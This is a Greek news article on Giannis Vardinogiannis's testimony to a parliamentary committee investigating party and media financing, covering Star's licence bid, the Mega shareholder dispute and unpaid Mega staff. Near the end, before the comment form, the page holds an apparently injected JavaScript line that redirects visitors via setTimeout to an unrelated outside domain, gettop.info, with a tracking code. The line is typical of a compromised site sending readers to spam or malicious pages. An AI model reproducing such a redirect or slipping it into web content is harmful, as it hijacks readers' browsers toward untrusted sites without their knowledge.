Βαρδινογιάννης: Το STAR θα βρει τρόπο να λειτουργεί και χωρίς άδεια

0
36

 

Στην Eξεταστική Eπιτροπή της Βουλής για τη διερεύνηση της χρηματοδότησης κομμάτων και ΜΜΕ κατέθεσε ο Γιάννης Βαρδινογιάννης.

Απαντώντας σε ερωτήσεις βουλευτών σχετικά με τις πρόσφατες αδειοδοτήσεις τηλεοπτικών καναλιών και τι προτίθεται να κάνει σε περίπτωση που ο σταθμός Star δεν πάρει άδεια, τόνισε: «Εγώ δεν άκουσα ότι έχασα την άδεια. Το κανάλι έχει άδεια και θέλω να πιστεύω ότι θα μείνει η άδειά του. Ότι θα δικαιωθούμε. Περιμένουμε την απόφαση του ΣτΕ και θα δούμε από κει και πέρα. Εκπονούμε για την επόμενη μέρα διάφορα σχέδια για να συνεχίσουμε την εκπομπή του σταθμού. Δεν σκοπεύουμε να εκπέμψουμε παράνομα. Γίνονται όλες οι επιχειρηματικές ενέργειες για να αποτρέψουμε τη διάλυση του σταθμού. Έχουμε ήδη δώσει αρκετά δικά μας χρήματα για να υπάρχει, και δεν θα εγκαταλείψουμε την προσπάθεια».

Σχετικά με το ύψος του τιμήματος των αδειών σε σχέση και με τη χαμηλή προσφορά που έκανε η εταιρεία, ο κ. Βαρδινογιάννης απάντησε: «Εμείς εκτιμήσαμε ότι τα 15 εκατ. ευρώ για να κερδίσουμε μια άδεια ήταν ένα ποσό αρκετά υψηλό. Εκτιμήσαμε όμως ότι αυτά τα 15 εκατ. μέσα στο χρόνο θα μπορούσαμε να τα πάρουμε πίσω. Πρέπει να ξέρετε ότι εμείς έχουμε βάλει στο Star 85 εκατ ευρώ τα 6 τελευταία χρόνια».

«Ο άλλος που έδωσε 70 εκατ. ευρώ επεδίωξε να κάνει επιχείρηση ή αποσκοπούσε να κάνει άλλα πράγματα;», ρωτήθηκε και σχολίασε: «Δεν μπορώ να απαντήσω για άλλους».

Ο πρωτότοκος γιος του Βαρδή Βαρδινογιάννη ρωτήθηκε πολλές φορές και για το Mega. «Η οικογένειά μας δεν είχε ποτέ την πλειοψηφία και, συνεπώς, δεν ασκήσαμε ποτέ τη διοίκηση», είπε. Και στράφηκε με έμμεσο αλλά ξεκάθαρο τρόπο κατά των συνεταίρων του στην ΤΗΛΕΤΥΠΟΣ ΑΕ :«Όσοι είχαν το μάνατζμεντ δεν μπόρεσαν να προβλέψουν τις συνέπειες της κρίσης και να πάρουν τα αναγκαία μέτρα. Το 2013 έγινε αύξηση μετοχικού κεφαλαίου, μετά όμως δεν έγιναν όσα έπρεπε».

Ερωτήσεις δέχθηκε και για τη δήλωση του Φώτη Μπόμπολα ότι οι μέτοχοί του Mega ευθύνονται για την απαξίωσή του. «Δεν υπήρξε σύγκλιση απόψεων μετάξύ των μετόχων για τον σχεδιασμό και τη διοίκηση του σταθμού. Κανείς δεν εμπόδισε τον άλλο μέτοχο να βάλει χρήματα. Δεν είναι σωστό να ρίχνει ο ένας το μπαλάκι στον άλλο. Εμείς επιλέξαμε να μη βάλουμε 15 εκ ευρώ για να πάρουμε την πλειοψηφία. Ας έβαζαν οι άλλοι, αν ήθελαν για να γίνουν κυρίαρχοι. Εγώ έχω μάθει να μετράω ευρώ με ευρώ»

Ερωτώμενος για τις παραγωγές σήριαλ και ειδικότερα για την «Άνωση» του Φώτη Μπόμπολα, τόνισε ότι η εταιρεία αυτή πήρε τη μερίδα του λέοντος από τις παραγωγές του σταθμού. Ενώ για το ποιος καθόριζε την πολιτική γραμμή του σταθμού απάντησε ότι δεν γνωριζει αν υπήρχε τέτοιος μηχανισμός.

Πολλοί βουλευτές τον ρώτησαν το Mega  θα πληρώσει τα δάνειά του. «Ειλκρινά δεν ξέρω. Ελπίζω πως αυτό θα συμβεί», είπε, ενώ ερωτώμενος για το αν θα πληρωθούν οι εργαζόμενοι του σταθμού (διανύουν τον πέμπτο μήνα απληρωσιάς) «έδειξε» τις τράπεζες. «Οφείλουν να ξεπαγώσουν τους λογαριασμούς και να πληρωθούν οι εργαζόμενοι. Υπάρχουν εκεί 30 εκατ ευρώ, ας απελευθερώουν τα χρήματα που αντιστοιχούν στους μισθούως των εργαζομένων».

Δυο βουλευτές τον ρώτησαν για ποιο λόγο συμμετείχε η οικογένειά του σε δυο κανάλια από τη στιγμή που υπήρχε τόσο μεγάλη χώρα. «Τα πρώτα χρόνια υπήρχε κερδοφορία και κανείς δεν περίμενε ότι η κατάσταση θα έφτανε σε αυτό το σημείο. Είχαμε πρόθεση να βάλουμε χρήματα στο Mega και το 2016, αλλά δε βρέθηκε λύση με τους συνεταίρους μας. Είμαστε μια μεγάλη οικογένεια, σοβαρή, αρκετά εύπορη, με πολυσχιδή επιχειρηματική δραστηριότητα. Και καμία απαγόρευση δεν μπορεί να υπάρχει για τα μέλη της οικογένειάς μου να συμμετάσχουν σε διάφορα Μέσα Ενημέρωσης».

Ο ίδιος έδωσε έμφαση στο γεγονός ότι η οικογένειά του δραστηριοποιείται στα Μέσα Ενημέρωσης από το 1980, απέρριψε αιτιάσεις περί επιχειρηματικών σκοπιμοτήτων και τόνισε ότι όσον αφορά στο Star «δεν έχουμε πολιτικούς προσανατολισμούς, πιστεύω ότι είμαστε το πιο ισορροπημένο δελτίο».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here